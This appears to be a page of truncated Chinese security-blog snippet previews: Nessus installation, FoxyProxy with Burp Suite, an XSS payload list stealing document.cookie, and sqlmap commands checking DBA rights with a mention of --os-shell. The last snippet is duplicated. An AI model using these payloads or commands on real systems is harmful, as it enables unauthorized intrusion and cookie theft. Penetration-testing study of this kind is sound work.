目前我的windows版本的Nessus已经安装成功浏览器打开https://localhost:8834/#/ adminadmin  下载环境https://www.tenable.com/downloads/nessus  下载成功安装 下载完成是个msi软件 我们来安装  里面可以选择安装路径 安装完成之后浏览器会弹出一个...

以前自己挖漏洞使用火狐+burp抓包测试，但是每次浏览器开代理老麻烦了今天同事无意间给我提了这个插件FoxyProxy 很实用，下面是使用教程，很直白很详细首先安装火狐插件FoxyProxy然后选择Options开始配置.然后重启浏览器选中Burpsuite 然后打开burp即可抓包关闭的时候也很简单...

验证xss的时候总感觉姿势不够这下好了   这么多  任你随便插'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script&

首先找到注入点 证明存在注入漏洞然后使用命令sqlmap.py -r D:\1.txt -p username --random-agent --is-dba看看是不是dba这里不是dba所以不能使用--os-shell命令如果是的话例如python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 -...

首先找到注入点 证明存在注入漏洞然后使用命令sqlmap.py -r D:\1.txt -p username --random-agent --is-dba看看是不是dba这里不是dba所以不能使用--os-shell命令如果是的话例如python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 -...